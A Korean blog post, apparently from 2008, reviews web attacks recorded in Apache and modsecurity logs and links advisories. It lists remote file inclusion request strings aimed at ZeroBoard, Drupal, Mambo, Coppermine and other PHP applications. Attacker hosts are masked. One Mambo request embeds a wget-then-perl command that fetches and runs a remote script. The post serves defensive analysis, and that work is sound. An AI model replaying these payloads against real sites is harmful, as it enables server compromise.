최근에 가장 많은 공격 빈도를 보이는 것은 zeroboard4 의 원격코드 실행 취약점 이고 다양한 웹프로그램에 대한
자동화된 공격(프로그램 내지 자동화된 스크립트 - php, perl)이 많이 보이고 있습니다.
apache 웹서버 로그와 modsecurity 로그에 남은 기록들을 기준으로 접근 방법과 관련 링크를 함께 적어보도록
하겠습니다. include하는특정 url의 파일은 악용될 소지가 있기때문에 필터링(?)했습니다.
ZeroBoard multiple vulnerabilities
Net_DNS <= 0.3 (DNS/RR.php) Remote File Include Vulnerability
PHP exploit using Drupal circulating
WebCalendar Send_Reminders.PHP Remote File Include Vulnerability
VWar 1.6.1 R2 Multiple Remote Vulnerabilities
Multiple vulnerabilities in Coppermine Photo Gallery for PhpNuke
4nalbum Module Cross-Site Scripting Attacks
Mambo Multiple Vulnerabilities
Spider Friendly Module for phpBB File Inclusion Vulnerability
perForms Remote File Inclusion
XZero Community Classifieds Multiple File Inclusion, SQL Injection Vulnerabilities
EQdkp Remote File Inclusion Vulnerability
V-Webmail Remote File Include Vulnerability
News Manager 2.0 Multiple Vulnerabilities
coppermine IFRAME inject Vulnerability
공격유형을 보면 javascript코드(obfuscated code) + php코드를 zip파일등으로 변경후(또는 jpg등의 이미지파일로) 업로드한뒤 실행 index.php파일을 변조해 특정 URL로 포워딩함.
CPG forum에서 hack당한 유저가 dump뜬 CPG의 db 파일을 열어보니 이미지 사이즈를 모두 1로 변경하고
보여지는 사진수도 1개로 수정하고 업로드시 거부 문자에서 #39를 제거 했군요.
기타 링크 : 최근 웹사이트 공격 유형 #2 http://free4u.wo.tc/9687
자동화된 공격(프로그램 내지 자동화된 스크립트 - php, perl)이 많이 보이고 있습니다.
apache 웹서버 로그와 modsecurity 로그에 남은 기록들을 기준으로 접근 방법과 관련 링크를 함께 적어보도록
하겠습니다. include하는특정 url의 파일은 악용될 소지가 있기때문에 필터링(?)했습니다.
ZeroBoard multiple vulnerabilities
관련링크: http://free4u.wo.tc/1682
GET //include/print_category.php?setup[use_category]=1&dir=http: //www.filtered.net/bbs//admin/safe1.txt???
GET //skin/zero_vote/error.php?dir=http ://www.filtered.pe/cnm/cache/tmp0/help0txt???
GET //skin/zero_vote/login.php?dir=http ://www.filtered.pe/cnm/cache/tmp0/help0txt???
GET //skin/zero_vote/setup.php?dir=http ://www.filtered.pe/cnm/cache/tmp0/help0txt???
GET //skin/zero_vote/ask_password.php?dir=http ://www.filtered.pe/cnm/cache/tmp0/help0txt???
zero_vote 스킨의 취약점을 노린(?)공격인데 문제가 있는 파일 (ask_password.php, error.php, login.php, setup.php)을 차례로 공략(?)하는군요!
GET //include/print_category.php?setup[use_category]=1&dir=http: //www.filtered.net/bbs//admin/safe1.txt???
GET //skin/zero_vote/error.php?dir=http ://www.filtered.pe/cnm/cache/tmp0/help0txt???
GET //skin/zero_vote/login.php?dir=http ://www.filtered.pe/cnm/cache/tmp0/help0txt???
GET //skin/zero_vote/setup.php?dir=http ://www.filtered.pe/cnm/cache/tmp0/help0txt???
GET //skin/zero_vote/ask_password.php?dir=http ://www.filtered.pe/cnm/cache/tmp0/help0txt???
zero_vote 스킨의 취약점을 노린(?)공격인데 문제가 있는 파일 (ask_password.php, error.php, login.php, setup.php)을 차례로 공략(?)하는군요!
Net_DNS <= 0.3 (DNS/RR.php) Remote File Include Vulnerability
관련링크: http://www.securityfocus.com/bid/20666
GET //weblog/?search_target=tag&search_keyword=geoip//sources/libs/geoip/DNS/RR.php?phpdns_basedir=http ://filtered.com/catalog/images/default/iyes.txt??
GET //sources/libs/geoip/DNS/RR.php?phpdns_basedir=http ://filtered.com/catalog/images/default/iyes.txt??
GET //weblog/?search_target=tag&search_keyword=geoip//sources/libs/geoip/DNS/RR.php?phpdns_basedir=http ://filtered.com/catalog/images/default/iyes.txt??
GET //sources/libs/geoip/DNS/RR.php?phpdns_basedir=http ://filtered.com/catalog/images/default/iyes.txt??
GET //weblog/?search_target=tag&search_keyword=geoip//sources/libs/geoip/DNS/RR.php?phpdns_basedir=http ://filtered.com/catalog/images/default/iyes.txt??
GET //sources/libs/geoip/DNS/RR.php?phpdns_basedir=http ://filtered.com/catalog/images/default/iyes.txt??
GET //weblog/?search_target=tag&search_keyword=geoip//sources/libs/geoip/DNS/RR.php?phpdns_basedir=http ://filtered.com/catalog/images/default/iyes.txt??
GET //sources/libs/geoip/DNS/RR.php?phpdns_basedir=http ://filtered.com/catalog/images/default/iyes.txt??
PHP exploit using Drupal circulating
관련링크: http://drupal.org/node/184313
GET //drupal/?_menu[callbacks][1][callback]=http ://filtered.com/images/stories/id.txt?
GET //drupal/?_menu[callbacks][1][callback]=http ://filtered.com/images/stories/id.txt?
WebCalendar Send_Reminders.PHP Remote File Include Vulnerability
관련링크: http://www.securityfocus.com/bid/14651
GET //weblog/tools/send_reminders.php?noSet=0&includedir=http ://filtered.net/zeroboard/styles/test.txt??
GET //weblog/tools/send_reminders.php?noSet=0&includedir=http ://filtered.net/zeroboard/styles/test.txt??
VWar 1.6.1 R2 Multiple Remote Vulnerabilities
관련링크: http://securitydot.net/vuln/exploits/vulnerabilities/articles/24766/vuln.html
GET //vwar/war.php?action=http ://filtered.ru/administrator/templates/id.txt??
GET //vwar/war.php?action=http ://filtered.ru/administrator/templates/id.txt??
Multiple vulnerabilities in Coppermine Photo Gallery for PhpNuke
관련링크: http://www.securitytracker.com/alerts/2004/Apr/1010001.html
GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http ://www.filtered.de//contenido/cronjobs/id.txt??
GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http ://www.filtered.de//contenido/cronjobs/id.txt??
4nalbum Module Cross-Site Scripting Attacks
관련링크: http://www.securitytracker.com/alerts/2004/Mar/1009449.html
GET //modules/4nAlbum/public/displayCategory.php?basepath=http ://filtered.ru/administrator/templates/id.txt??
GET //modules/4nAlbum/public/displayCategory.php?basepath=http ://filtered.ru/administrator/templates/id.txt??
Mambo Multiple Vulnerabilities
관련링크: http://archives.neohapsis.com/archives/bugtraq/2006-02/0463.html
GET //index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http
://www.filtered.com/nokia-yes/tool.gif?&cmd=cd%20/tmp/;wget%20http ://www.filtered.com/nokia-yes/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*?
GET //index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http
://www.filtered.com/nokia-yes/tool.gif?&cmd=cd%20/tmp/;wget%20http ://www.filtered.com/nokia-yes/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*?
Spider Friendly Module for phpBB File Inclusion Vulnerability
관련링크: http://www.frsirt.com/english/advisories/2006/4290
GET //admin/modules_data.php?phpbb_root_path=http ://h1.filtered.com/mocca69/id.txt?
GET //admin/modules_data.php?phpbb_root_path=http ://h1.filtered.com/mocca69/id.txt?
perForms Remote File Inclusion
관련링크: http://securitytracker.com/alerts/2006/Jul/1016498.html
GET //?mosConfig_absolute_path=http ://filtered.co.uk/guestbook/es.txt??
GET //?mosConfig_absolute_path=http ://filtered.co.uk/guestbook/es.txt??
XZero Community Classifieds Multiple File Inclusion, SQL Injection Vulnerabilities
관련링크: http://secwatch.org/advisories/1019879/
GET //config.inc.php?path_escape=http ://filtered.com/test.txt?
GET //config.inc.php?path_escape=http ://filtered.com/test.txt?
EQdkp Remote File Inclusion Vulnerability
관련링크: http://www.frsirt.com/english/advisories/2006/1693
GET //includes/dbal.php?eqdkp_root_path=http ://www.filtered.com//components/com_facileforms/strings.txt?
GET //includes/dbal.php?eqdkp_root_path=http ://www.filtered.com//components/com_facileforms/strings.txt?
V-Webmail Remote File Include Vulnerability
관련링크: http://securitytracker.com/alerts/2006/May/1016160.html
GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http ://rooting.filtered.com/test.txt?
GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http ://rooting.filtered.com/test.txt?
News Manager 2.0 Multiple Vulnerabilities
관련링크: http://www.milw0rm.com/exploits/download/5624
GET //ch_readalso.php?read_xml_include=http ://filtered.net/test.txt?
GET //ch_readalso.php?read_xml_include=http ://filtered.net/test.txt?
coppermine IFRAME inject Vulnerability
아래는 이곳에서도 사용중인 coppermine photo gallery(이하 CPG)의 최근 취약점에 관한것인데
아직은 CPG가 국내보다는 해외에서 많이 사용되고 있기 때문에 공격빈도가 그리 많지 않아 보입니다.
보안관련 사이트에서도 많이 다루고 있지 않는듯(현재 나온 취약점에 관한)해서 제목역시 제가 붙여 봤습니다.
관련링크 :
http://forum.coppermine-gallery.net/index.php/topic,51882.0.html
http://forum.coppermine-gallery.net/index.php/topic,51671.0.html
GET //coppermine/update.php
GET //coppermine/pluginmgr.php?op=upload
GET /coppermine/update.php HTTP/1.1" 200 - remote 유저가 update.php를 실행할수 있는 문제점이 있네요.
POST /coppermine/upload.php HTTP/1.1" 200 - 파일을 올리고 있습니다.
GET /coppermine/displayimage.php?album=lastup&cat=0&pos=0 - 업로드한것을 확인해 보는군요.
아직은 CPG가 국내보다는 해외에서 많이 사용되고 있기 때문에 공격빈도가 그리 많지 않아 보입니다.
보안관련 사이트에서도 많이 다루고 있지 않는듯(현재 나온 취약점에 관한)해서 제목역시 제가 붙여 봤습니다.
관련링크 :
http://forum.coppermine-gallery.net/index.php/topic,51882.0.html
http://forum.coppermine-gallery.net/index.php/topic,51671.0.html
GET //coppermine/update.php
GET //coppermine/pluginmgr.php?op=upload
GET /coppermine/update.php HTTP/1.1" 200 - remote 유저가 update.php를 실행할수 있는 문제점이 있네요.
POST /coppermine/upload.php HTTP/1.1" 200 - 파일을 올리고 있습니다.
GET /coppermine/displayimage.php?album=lastup&cat=0&pos=0 - 업로드한것을 확인해 보는군요.
공격유형을 보면 javascript코드(obfuscated code) + php코드를 zip파일등으로 변경후(또는 jpg등의 이미지파일로) 업로드한뒤 실행 index.php파일을 변조해 특정 URL로 포워딩함.
CPG forum에서 hack당한 유저가 dump뜬 CPG의 db 파일을 열어보니 이미지 사이즈를 모두 1로 변경하고
보여지는 사진수도 1개로 수정하고 업로드시 거부 문자에서 #39를 제거 했군요.
기타 링크 : 최근 웹사이트 공격 유형 #2 http://free4u.wo.tc/9687
'Security' 카테고리의 다른 글
Safari update fixes "carpet bomb" flaw (0) | 2008.06.25 |
---|---|
보안 관련 사이트 (mailling) (0) | 2008.06.16 |
phpMyAdmin security vulnerability (0) | 2008.05.06 |
rkhunter (rootkit hunter) (0) | 2008.04.22 |
Linux kernel Local Exploit (0) | 2008.02.13 |